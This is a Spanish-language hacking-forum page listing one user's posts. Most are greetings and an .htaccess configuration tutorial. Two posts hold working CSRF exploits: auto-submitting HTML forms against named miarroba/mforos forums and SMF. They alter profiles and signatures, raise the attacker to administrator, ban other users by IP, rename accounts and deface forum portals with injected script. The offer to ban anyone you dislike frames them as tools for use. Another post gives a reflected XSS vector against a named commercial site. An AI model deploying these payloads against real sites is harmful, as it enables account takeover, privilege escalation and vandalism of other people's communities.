Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - Réplica1

Páginas: 1 [2] 3
21
Presentaciones / Re:Buenas a todos
« en: Septiembre 03, 2013, 09:15:35 am »
Bienvenido amigo, espero que te lo pases bien y aportes!

Saludos.

22
Presentaciones / Re:Holaa!
« en: Septiembre 03, 2013, 09:13:19 am »
Bienvenido kaway! siéntete bienvenido.

Saludos.

23
Hacking ShowOff / Re:[XSS Reflejado] pandawill.com
« en: Septiembre 02, 2013, 09:17:48 pm »
Buen trabajo!! ;D

Saludos.

24
Wow! excelente crazy muy interesante, y llevas toda la razon.

Saludos.

25
Presentaciones / Re:Hola a todos!
« en: Agosto 30, 2013, 03:50:45 pm »
Bienvenido al foro! se bienvenido.

Saludos.

26
Ideas y Sugerencias / Re:[PROPUESTA] Taller de Autoit
« en: Agosto 30, 2013, 02:51:00 pm »
No necesitas talleres, ahí mucha información y tutoriales que ya están echos para que puedas aprender, solo es buscar y encontraras muchos.

Aunque si alguien se ofrece a hacerlo, también serviría de mucho.

27
Bugs y Exploits / Re:Ataques a aplicaciones web
« en: Agosto 30, 2013, 02:17:15 pm »
Se ve muy interesante, se está descargando haber si es tan bueno como parece!

Saludos.


28
Delphi / Re:[Delphi] Creacion de un Joiner
« en: Agosto 29, 2013, 06:33:38 pm »
Exelento bro, muy bien explicado  ;D

29
Presentaciones / Re:Me presento
« en: Agosto 29, 2013, 06:31:47 pm »
Bienvenido al foro! espero que te diviertas y aprendas cualquier cosa no dudes en preguntarla  ;)

Un saludo.

30
Python / Re:Golismero 2.0
« en: Agosto 29, 2013, 06:28:46 pm »
Interesante, muchas gracias por traerlo ahora mismo lo probare!

Saludos.

31
Bugs y Exploits / Re:CSRF Raven Botnet
« en: Agosto 28, 2013, 02:33:37 pm »
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!


32
Zona Webmaster / Como usar el .htaccess
« en: Agosto 28, 2013, 10:46:54 am »
¿Qué es un .htaccess?

El .htaccess (Acceso de Hiper-Texto) es el nombre por defecto del archivo de configuración de directorios de Apache. Se utiliza para personalizar la configuración de directivas y parámetros definidos en el archivo de configuración principal del alojamiento. Tiene una gran variedad de usos y utilidades que le pueden resultar útiles en su web. En el siguiente tutorial le mostramos algunas de las funciones más utilizadas por el .htaccess.


¿Cómo crear y dónde colocar un fichero .htaccess?

Para crear un fichero .htaccess, abra el bloc de notas e introduzca el código necesario. Guarde el fichero como fichero de texto (.txt), por ejemplo "fichero_htaccess.txt", y súbalo por FTP en la carpeta donde tiene que utilizarse. Una vez en el servidor, modifique el nombre del fichero "fichero_htaccess.txt" por el de ".htaccess".

El .htaccess debe colocarse en el interior de la carpeta donde queremos que tenga efecto. Por ejemplo, si queremos proteger con contraseña una carpeta llamada "privado", colocaremos el .htaccess dentro de la carpeta "privado".


Utilidades comunes  del .htaccess

El .htaccess tiene un gran número de utilidades, en este tutorial le mostramos algunas de las utilidades más comunes y cómo debe configurarse en el fichero .htaccess

Control de acceso al sitio

Podemos hacer que, si por alguna razón deseamos denegar el acceso a todos los usuarios o sólo permitir a un cierto grupo de direcciones IP para que tengan acceso a tu sitio.

Para permitir el acceso a tu sitio solo a ciertas IPs:

Código: [Seleccionar]
ErrorDocument 403 [url]http://www.mi-url.com[/url]
Order deny,allow
Deny from all
Allow from 124.34.48.165
Allow from 102.54.68.123

Las IPs 124.34.48.165 y 102.54.68.123 son las IPs que tendrán acceso a la web.

Denegar el acceso al sitio solo a ciertas IPs:

Código: [Seleccionar]
Allow from all
Deny from 145.186.14.122
Deny from 124.15

La IP 145.186.14.122 y la red 124.15.x.x no tendrán acceso a la web.

Control de acceso a carpetas

Un uso muy común del .htaccess es impedir el acceso a algunas carpetas. Puede ser que queramos deshabilitar totalmente el acceso a una carpeta (por ejemplo, una carpeta con librerías de programación que se incluyen en los archivos principales. En este caso sólo los archivos principales accederán a ellos mediante el sistema de archivos, pero no se podrán acceder via web). Bueno, simplemente creamos un archivo .htaccess en esa carpeta que contenga el siguiente codigo si deseamos:

Prohibir o deshabilitar por completo el acceso a una carpeta:

Código: [Seleccionar]
#deny all access
deny from all

Permitir el acceso desde una IP específica:

Código: [Seleccionar]
#deny all access
deny from all
allow from 212.267.98.14

Permitir el acceso a un rango específico de IPs (forzado mediante la máscara de red):

Código: [Seleccionar]
allow from 192.168.0.0/24
Bloquear el acceso a un archivo específico:

Código: [Seleccionar]
<Files archivo.html>
Order allow,deny
Deny from all

Listado de carpetas

También podemos utilizar el .htaccess para mostrar el contenido de una carpeta en la estructura de directorios.

Código: [Seleccionar]
Options +Indexes
Listado de carpetas, pero no queremos que se nos muestren los iconos por defecto:

Código: [Seleccionar]
Options +Indexes
IndexOptions -FancyIndexing

También se podría querer evitar el listado de carpetas:

Código: [Seleccionar]
IndexIgnore *
Redirigir web

Si al acceder a su alojamiento, desea redirigir la página a otra:

Código: [Seleccionar]
RewriteEngine On
RewriteRule ^(.*)$ [url]http://www.webaredirigir.com/[/url]$1 [R=301,L]

Redirigir peticiones a subcarpeta

Si tenemos la web en una subcarpeta diferente de la carpeta "web", podemos redirigir todas las consultas a esta subcarpeta:

Código: [Seleccionar]
RewriteEngine on
RewriteCond % ^midominio.com\.com$
RewriteRule (.*) [url]http://www.midominio.com/[/url]$1 [R=301,L]
RewriteRule ^$ carpeta [L]

donde:
midominio.com\.com sería, por ejemplo, cdmon\.com.com
carpeta sería, por ejemplo, wordpress

Redirigir peticiones con www.dominio.com a dominio.com y a la inversa

Si queremos que nuestra web se vea siempre sin www, añadimos el siguiente código en el .htaccess:

Código: [Seleccionar]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond % !-f
RewriteCond % !-d
RewriteRule . /index.php [L]
RewriteCond % ^www\.midominio.com [NC]
RewriteRule ^(.*)$ [url]http://midominio.com/[/url]$1 [L,R=301]
</IfModule>

I al revés, que la web se vea siempre con www:

Código: [Seleccionar]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond % !-f
RewriteCond % !-d
RewriteRule . /index.php [L]
RewriteCond % ^\.midominio.com [NC]
RewriteRule ^(.*)$ [url]http://www.midominio.com/[/url]$1 [L,R=301]
</IfModule>

donde:
midominoi.com podría ser, por ejemplo, cdmon.com

Redirigir web amigable con SEO

Si has transferido nombres de dominio o deseas redireccionar a una página específica sin que afecte a los resultados de los motores de búsqueda como Google, utiliza el siguiente código:

Código: [Seleccionar]
Redirect 301 /d/nombredelarchivo.html [url]http://www.mi-url.com[/url]
Redireccionar el tráfico web

Si lo que deseamos es que si alguien intenta acceder a un archivo en concreto le redirija a otro fichero, podemos utilizar la directiva Redirect:

Código: [Seleccionar]
Redirect /fichero.php [url]http://sudominio.com/otros/nuevofichero.php[/url]
Redireccionar a conexión segura HTTPS

Si deseamos redireccionar todo nuestro sitio a una conexión segura (HTTPS), esto es muy util si por ejemplo disponemos de un certificado SSL y queremos trabajar con el.

Código: [Seleccionar]
RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ [url]https://www.midominio.com/[/url]$1 [R,L]

Redireccionar usuarios para usar HTTPS para una carpeta en particular

Si lo que deseamos es solo redireccionar a una conexión segura (HTTPS) una carpeta en particular en vez de todo el sitio, por ejemplo tenemos una tienda en una carpeta aparte de nuestro sitio, hay que usar el siguiente codigo.

Código: [Seleccionar]
RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteCond %{REQUEST_URI} nombre_de_la_carpeta
RewriteRule ^(.*)$ [url]https://www.midominio.com/nombre_de_la_carpeta/[/url]$1 [R,L]

Evitar el hotlinking

El hotlinking consiste en realizar un enlace directo a ficheros, generalmente imágenes y vídeos, que pertenecen a otra web. Esta práctica consume la transferencia del sitio original de la imagen. Para evitar que nos "roben" ancho de banda podemos configurar el .htaccess para impedir el hotlinking. RewriteEngine on

Código: [Seleccionar]
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?midominio.com/.*$ [NC]

Ahora falta la ultima linea que puede ser para prohibir que contenido no deseamos (se escoje en función de las extensiones de los archivos) que nos cojan:

Código: [Seleccionar]
RewriteRule .*\.(jpe?g|gif|bmp|png)$ [L]
O bien esta otra regla que además muestra un archivo (no_robar_ancho_de_banda.gif que debemos haber creado previamente) para advertir que esta imagen esta siendo cogida de nuestro site.

Código: [Seleccionar]
RewriteRule .*.(gif|jpg|png)$ [url]http://midominio.com/img/no_robar_ancho_de_banda.gif[/url][nc]
En la última línea ponemos las extensiones de los ficheros que queremos impedir que los enlacen.

Cambiar la pagina por defecto

Puedes hacer que la página indice de tu sitio a mostrar no sea la archiconocida "index". Aquí seteamos "about.html" como página de inicio:

Código: [Seleccionar]
#Serve Alternate Default Index Page
DirectoryIndex about.html

Quitar palabras o strings de una URL

Esta opción sirve para evitar que la gente conozca nuestro arbol de rutas de nuestro alojamiento con ello incrementamos la seguridad a la vez que hacemos la dirección más atractiva. En este ejemplo, quitaremos la palabra "category" de nuestras URL.

Es decir: http://tudominio.com/category/blue -> http://tudominio.com/blue

Agrega este código al final de tu .htaccess

Código: [Seleccionar]
RewriteRule ^category/(.+)$ [url]http://www.midominio.com/[/url]$1 [R=301,L]
Forzar el cacheo de nuestro sitio

El siguiente snippet no va a incrementar directamente la velocidad de carga del sitio en general, pero sí va a cargar más rápido cuando el mismo usuario vuelva a visitarlo, al enviar un status 304 cuando se pidan elementos que no han sido modificados. Puedes cambiar la frecuencia de cacheo al cambiar el número de segundos (en este ejemplo se da una vez al día):

Código: [Seleccionar]
FileETag MTime Size
ExpiresActive on
ExpiresDefault "access plus 86400 seconds"

Mejorar la compatibilidad de los caracteres

Esta opción es para aquellos que no utilizan un juego de caracteres standard reconocido por el servidor, con esta medida evitamos mostrar el famoso error 500.

Código: [Seleccionar]
AddDefaultCharset utf-8
Crear URL amigables

Una URL amigable consiste en disfrazar una URL llena de parámetros para que quede más elegante y para ayudar también a tener una mejor posición de la página en los buscadores.

Por ejemplo, carpeta/fichero.php?id=120&idioma=es es una URL no amigable, por lo que la transformaremos en carpeta/fichero/120/es que es más elegante y ayuda al posicionamiento en los buscadores. Es una URL amigable. Con el fichero .htaccess podemos realizar este disfraz para la URL.

Tenemos una carpeta en nuestra web que tiene un fichero al que se le pasan parámetros.

sudominio.com/carpeta/fichero.php?id=25

Entonces, dentro de esta carpeta crearemos un .htaccess con el siguiente código:

Código: [Seleccionar]
Options +FollowSymLinks
RewriteEngine on
RewriteRule carpeta/(.*)/(.*).php$ /carpeta/fichero.php?id=$1

En la última línea es donde se realiza el cambio.

(.*) será el parámetro que le pasaremos, $1.

(.*).php$ será el nombre del fichero para "decorar" la URL.

Una vez creado el .htaccess, en el enlace de nuestra web pondremos:

Código: [Seleccionar]
<a href="carpeta/25/nombre-del-fichero.php"> Enlace al fichero 25</a>
Por lo tanto, carpeta/25/nombre-del-fichero.php será lo mismo que /carpeta/fichero.php?id=25.

Fuente: https://info.cdmon.com/index.php?page=como-utilizar-htaccess&hl=esp

Saludos.

33
Talleres Underc0de / Re:[#1] Taller programacion C#
« en: Agosto 27, 2013, 02:19:20 pm »
Muchas gracias CrazyKade y todo los que colaboraron en realizar este estupendo taller yo sinceramente lo aprovechare y intentare aprender todo lo posible.

Saludos.

34
Presentaciones / Re:hello world
« en: Agosto 27, 2013, 01:00:25 pm »
Bienvenido, un gusto tener gente con tu experiencia por aquí.

Un saludo!  ;)

35
Bugs y Exploits / CSRF'S miarroba forums [By Pekador]
« en: Agosto 27, 2013, 09:39:34 am »
Para cambiar la firma de cualquier foro [email protected]

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://netpoison.mforos.com/options/[/url]" method=post name="csrf1">
  8. <input type="hidden" name="firma" value="Underc0de.org">
  9. <input type="hidden" name="boton_continuar" value="Continuar">
  10. <body onload="envio_csrf()">

-----------------------------------------------------------------------------------------------------

Este csrf se tarda mas en ejecutarlo ya que por cada palabra lo tienes que subir a un hosting distinto pero sigue valiendo, lo que ara es una vez que alla filtrado esa palabra se redirigira a el otro csrf y se filtraba y así sucesivamente es algo 'molesto' pero sigue valiendo!

lo que hace es filtrar palabras como 'hola' por la palabra que queramos.

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/filtro_palabras.php?id=2099129[/url]" method=post name="csrf1">
  8. <input type="hidden" name="original" value="hola">
  9. <input type="hidden" name="filtrada" value="Underc0de.org">
  10. <input type="hidden" name="boton_continuar" value="Continuar">
  11. <body onload="envio_csrf()">
  12.  
  13. <?php
  14. header('Location: otrocsrf.com');
  15. ?>

---------------------------------------------------------------------------------------------------------------------------

Con este csrf desactivas el avatar o la firma a cualquier usuario permanentemente asta que la vuelvan activar

Firma:


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://netpoison.mforos.com/users/crackme/[/url]" method=post name="csrf1">
  8. <input type="hidden" name="tabla_boton" value="Desactivar firma">
  9. <body onload="envio_csrf()">


Avatares: 


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://netpoison.mforos.com/users/crackme/[/url]" method=post name="csrf1">
  8. <input type="hidden" name="boton" value="Desactivar avatares">
  9. <body onload="envio_csrf()">

------------------------------------------------------------------------------------------------------------------------------

Con este csrf puedes elevarte los privilegios a administrador


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://teamhackworld.mforos.com/users/crackme/[/url]" method=post name="csrf1">
  8. <input type="hidden" name="nuevo_nivel" value="999">
  9. <input type="hidden" name="accion" value="Cambiar nivel">
  10. <body onload="envio_csrf()">

-------------------------------------------------------------------------------------------------------------------------------

Esta sirve para crear un subforo nuevo

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/nuevo_subforo.php?id=2099129[/url]" method=post name="csrf1">
  8. <input type="hidden" name="forotitulo" value="Underc0de.org">
  9. <input type="hidden" name="forodesc" value="El mejor foro">
  10. <input type="hidden" name="txp" value="100">
  11. <input type="hidden" name="mxp" value="100">
  12. <input type="hidden" name="activacode" value="no">
  13. <input type="hidden" name="boton_continuar" value="Continuar">
  14. <body onload="envio_csrf()">

---------------------------------------------------------------------------------------------------------------------------

Este csrf cambia los datos generales de tu usuario de [email protected], tu nombre real, tu website, intereses, aficiones, firma etc

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://privados.miarroba.es/#!new[/url]" method=post name="csrf1">
  8. <input type="hidden" name="homepage" value="[url=http://www.Underc0de.org]www.Underc0de.org[/url]">
  9. <input type="hidden" name="nombre" value="Pekador">
  10. <input type="hidden" name="apellidos" value="Revise su seguridad">
  11. <input type="hidden" name="firma" value="Visita Underc0de">
  12. <input type="hidden" name="descripcion" value="CSRF">
  13. <input type="hidden" name="aficiones" value="Underc0de.org">
  14. <input type="hidden" name="boton_continuar" value="Continuar">
  15. <body onload="envio_csrf()">

--------------------------------------------------------------------------------------------------------------------------

Estos de [email protected] tienen mas csrf en sus foros ..., aquí os dejo otro esta vez para banear por ip ¿te cae mal alguien y te sabes su ip? banealo de cualquier foro [email protected] ;D

para sacar la id del foro, poner /admin despues de la url: foro.mforos.com/admin

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/baneo_ip.php?id=2099129&do=new[/url]" method=post name="csrf1">
  8. <input type="hidden" name="text" value="Aquí la ip que quieran banear">
  9. <input type="hidden" name="motivo" value="//**Underc0de.org**//">
  10. <input type="hidden" name="time" value="30">
  11. <input type="hidden" name="boton_continuar" value="Continuar">
  12. <body onload="envio_csrf()">

-------------------------------------------------------------------------------------------------------------------------------

Buenas aquí os dejo este csrf para [email protected] que sirve para cambiar la url del foro, entre otras cosas menos importantes :D

necesitaremos la id del foro, se consige poniendo /admin despues de la url del foro

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/general.php?id=2099129[/url]" method=post name="csrf1">
  8. <input type="hidden" name="titulo" value="Underc0de"> //
  9. <input type="hidden" name="nombre" value=".org">
  10. <input type="hidden" name="descripcion" value="Underc0de.org">
  11. <input type="hidden" name="categoria" value="10">
  12. <input type="hidden" name="tagsService[]" value="pwned">
  13. <input type="hidden" name="boton_continuar" value="Continuar">
  14. <body onload="envio_csrf()">
  15.  

-----------------------------------------------------------------------------------------------------------------------------------

Cambia el nombre de la cuenta de [email protected]

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://miarroba.es/usuarios/modificar.php[/url]" method=post name="csrf1">
  8. <input type="hidden" name="privacidad" value="registrados">
  9. <input type="hidden" name="nick" value="Underc0de">
  10. <input type="hidden" name="pais" value="12">
  11. <input type="hidden" name="provincia" value="192">
  12. <input type="hidden" name="zipcode" value="60155">
  13. <input type="hidden" name="sexo" value="Hombre">
  14. <input type="hidden" name="dia" value="5">
  15. <input type="hidden" name="mes" value="11">
  16. <input type="hidden" name="ano" value="1994">
  17. <input type="hidden" name="boletin" value="si">
  18. <input type="hidden" name="promos" value="si">
  19. <input type="hidden" name="accion" value="update">
  20. <input type="hidden" name="boton_continuar" value="Continuar">
  21. <body onload="envio_csrf()">
  22.  

------------------------------------------------------------------------------------------------------------------------------------

Rara defacear el portal de cualquier foro de [email protected] claro que tenga el portal activado

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/portal.php?id=2037885&seccion=crear_contenido&tipo=personalizado[/url]" method=post name="csrf1">
  8. <input type="hidden" name="titulo" value="Pekador">
  9. <input type="hidden" name="codigo" value="<script>document.documentElement.innerHTML='<iframe width=100% height=100% src=URL DEFACE>';</script>">
  10. <input type="hidden" name="columna" value="2">
  11. <input type="hidden" name="nivelmin" value="0">
  12. <input type="hidden" name="nivelmax" value="0">
  13. <input type="hidden" name="tipo" value="personalizado">
  14. <input type="hidden" name="boton_continuar" value="Continuar">
  15. <body onload="envio_csrf()">

---------------------------------------------------------------------------------------------------------------------------------------

Reportado: Sí, pero el dueño no sabe fixearlas yo le ofrecí mi ayuda y la rechazo.

Y hay muchos mas, esto demuestra la seguridad de esos foro saludos y hasta la próxima.

36
Hacking ShowOff / Re:XSS - Nutella
« en: Agosto 27, 2013, 08:24:41 am »
Este ya lo había reportado y publicado yo el 20 de Febrero :P
Aquí una imagen: https://twitter.com/migueljimeno96/status/304321710482661376
Saludos. ((:

Desconocia que había sido descubierta y reportada por ti, con esto lo que me doy cuenta es que los de nutella no hacen caso a los reportes ya que si desde febrero no lo repararon...

Saludos y perdon!

37
Bugs y Exploits / Re:[CSRF] [SMF] Cambiar perfil
« en: Agosto 26, 2013, 10:42:01 pm »
Muchas gracias por comentar, mañana publicare todos los csrf de foros miarroba que tengo y son bastantes!

Saludos  ;)

38
Hacking ShowOff / XSS - Nutella
« en: Agosto 26, 2013, 10:04:19 pm »
Encontre este XSS en la web oficial de nutella..

http://i.imgur.com/xNwhmCG.jpg

URL: www.nutella.es
Path: Buscador.
Vector Utilizado: "><script>alert("Pekador Holoscripter")</script>
Autor: Pekador
Reportado: Sí, pero sin respuesta.

39
Bugs y Exploits / Re:[CSRF] [SMF] Cambiar perfil
« en: Agosto 26, 2013, 09:09:01 pm »
Muy bueno!
A que versiones de SMF afecta?

Saludos!
ANTRAX

Afectava a la 2.0.4,  pero al reportarla la fixearon a las horas y con algunas fallas mas sacaron la 2.0.5.

Ahora para verificar al aceptar usa tu pass y user encryptados en md5 si no me equivoco y se tendria que tener el user y pass, y no tendria sentido ya que tendrias la cuenta y puedes hacerlo manualmente.

- Saludos;)

40
Bugs y Exploits / [CSRF] [SMF] Cambiar perfil
« en: Agosto 26, 2013, 08:12:44 pm »
Hoy os traigo un csrf en SMF.

Esto es importante, en la ultima linea:

Código: [Seleccionar]
<input type="hidden" name="u" value="94">
En value, donde pone '94' ahí que poner el numero de perfil de la victima es tan fácil como ir a tu perfil y ir cambiando el ultimo numero asta que encuentres su perfil.


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foro.com/foro/index.php?action=profile;area=forumprofile[/url]" method=post name="csrf1">
  8. <input type="hidden" name="avatar_choice" value="none">
  9. <input type="hidden" name="personal_text" value="P3K4D0R">
  10. <input type="hidden" name="bday3" value="6666">
  11. <input type="hidden" name="bday1" value="01">
  12. <input type="hidden" name="bday2" value="12">
  13. <input type="hidden" name="location" value="Mongolia">
  14. <input type="hidden" name="msn" value="[email protected]">
  15. <input type="hidden" name="usertitle" value="Pekador">
  16. <input type="hidden" name="signature" value="Underc0de">
  17. <input type="hidden" name="website_title" value="Underc0de">
  18. <input type="hidden" name="website_url" value="Underc0de.org">
  19. <input type="hidden" name="button_submit" value="Cambiar perfil">
  20. <input type="hidden" name="u" value="94">
  21. <body onload="envio_csrf()">

Reportado: Sí, y fixeado en todas las versiones.

Páginas: 1 [2] 3